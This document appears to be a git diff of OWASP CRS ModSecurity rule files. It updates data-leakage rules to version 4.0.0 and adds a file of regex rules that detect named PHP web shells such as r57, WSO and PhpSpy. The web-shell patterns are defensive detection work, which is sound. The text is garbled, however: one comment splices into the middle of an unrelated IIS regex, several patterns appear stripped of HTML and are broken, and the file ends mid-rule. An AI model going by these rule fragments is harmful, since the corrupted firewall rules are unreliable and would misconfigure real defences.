@@ -65,34 +64,32 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952014,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952015,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:952016,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL 
"@lt 4" "id:952018,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952017,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:952018,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf index 94933a279b..d0955d222a 100644 --- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953011,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:953012,phase:4,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -29,7 +30,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ capture,\ t:none,\ msg:'PHP Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -38,11 +39,9 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ PHP source code leakage ]=- @@ -56,7 +55,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan capture,\ t:none,\ msg:'PHP source code leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ 
@@ -65,29 +64,24 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -# Detect the presence of the PHP open tag ".{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error<\/h1>.*?

part of the server has crashed or it has a configuration error\.<\/h2>|cannot connect to the server: timed out)" \ +SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error

.*?

part of the server has crashed or it has a configuration error\.

|cannot connect to the server: timed out)" \ "id:954110,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Application Availability Error',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-iis',\ @@ -59,23 +58,21 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:<\/font tag:'PCI/6.5.6',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # IIS Errors leakage # -SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application uses a value of the wrong type for the current operation\b|error')| trappable error occurred in an external object\. The script cannot continue running\b)|Microsoft VBScript (?:compilation (?:\(0x8|error)|runtime (?:Error|\(0x8))\b|Object required: '|error '800)|Version Information:<\/b>(?: |\s)(?:Microsoft \.NET Framework|ASP\.NET) Version:|>error 'ASP\b|An Error Has Occurred|>Syntax error in string in query expression|\/[Ee]rror[Mm]essage\.aspx?\?[Ee]rror\b)" \ +SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ "id:954120,\ phase:4,\ block,\ capture,\ t:none,\ msg:'IIS Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-iis',\ 
@@ -85,11 +82,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application
 tag:'OWASP_CRS',\
 tag:'capec/1000/118/116',\
 tag:'PCI/6.5.6',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'ERROR',\
- setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_STATUS "!@rx ^404$" \
@@ -99,7 +94,7 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
 capture,\
 t:none,\
 msg:'IIS Information Leakage',\
- logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\
 tag:'application-multi',\
 tag:'language-multi',\
 tag:'platform-iis',\
@@ -109,38 +104,36 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/118/116',\
 tag:'PCI/6.5.6',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'ERROR',\
 chain"
 SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \
 "capture,\
 t:none,\
- setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
+ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
-# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS"
 #
-# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" 
"id:954017,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-955-WEB-SHELLS.conf b/rules/RESPONSE-955-WEB-SHELLS.conf new file mode 100644 index 0000000000..d8a2e4b700 --- /dev/null +++ b/rules/RESPONSE-955-WEB-SHELLS.conf 
@@ -0,0 +1,548 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.0.0 +# Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# For performance reasons, most of the shells are matched using this rule. +# This rule is intended for PHP web shells. 
+SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ + "id:955100,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Web shell detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# r57 web shell +SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 shell)" \ + "id:955110,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'r57 web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# WSO web shell +SecRule RESPONSE_BODY "@rx ^.*? 
- WSO [0-9.]+" \ + "id:955120,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'WSO web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# b4tm4n web shell (https://github.com/k4mpr3t/b4tm4n) +SecRule RESPONSE_BODY "@rx B4TM4N SH3LL.*" \ + "id:955130,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'b4tm4n web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Mini Shell web shell +SecRule RESPONSE_BODY "@rx Mini Shell.*Developed By LameHacker" \ + "id:955140,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Mini Shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Ashiyane web shell +SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." 
\ + "id:955150,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Ashiyane web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Symlink_Sa web shell +SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ + "id:955160,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Symlink_Sa web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# CasuS web shell +SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ + "id:955170,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'CasuS web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# GRP WebShell +SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ + "id:955180,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'GRP WebShell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# NGHshell web shell +SecRule 
RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ + "id:955190,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'NGHshell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# SimAttacker web shell +SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " \ + "id:955200,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'SimAttacker web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web Shell" \ + "id:955210,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# lama's'hell web shell +SecRule RESPONSE_BODY "@rx lama's'hell v. 
[0-9.]+" \ + "id:955220,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'lama\'s\'hell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# lostDC web shell +SecRule RESPONSE_BODY "@rx ^ *\n[ ]+\n[ ]+lostDC - " \ + "id:955230,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'lostDC web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell\r\n\r\n\r\n " \ + "id:955240,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Unknown web shell +SecRule RESPONSE_BODY "@rx ^\n\n
Input command :
\n
" \ + "id:955250,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Unknown web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Ru24PostWebShell web shell +SecRule RESPONSE_BODY "@rx ^\n\nRu24PostWebShell - " \ + "id:955260,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'Ru24PostWebShell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# s72 Shell web shell +SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King" \ + "id:955270,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'s72 Shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# PhpSpy web shell +SecRule RESPONSE_BODY "@rx ^\r\n\r\n\r\nPhpSpy Ver [0-9]+" \ + "id:955280,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'PhpSpy web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + 
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# g00nshell web shell +SecRule RESPONSE_BODY "@rx ^ \n\n\n\ng00nshell v[0-9.]+ " \ + "id:955290,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'g00nshell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# PuNkHoLic shell web shell +# Various versions has this text written little differently so we need to do +# t:removeWhitespace and t:lowercase. +SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ + "id:955300,\ + phase:4,\ + block,\ + capture,\ + t:none,t:removeWhitespace,t:lowercase,\ + msg:'PuNkHoLic shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# azrail web shell +SecRule RESPONSE_BODY "@rx ^\n \n azrail [0-9.]+ by C-W-M" \ + "id:955310,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'azrail web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# SmEvK_PaThAn Shell web shell +SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by \n.*? 
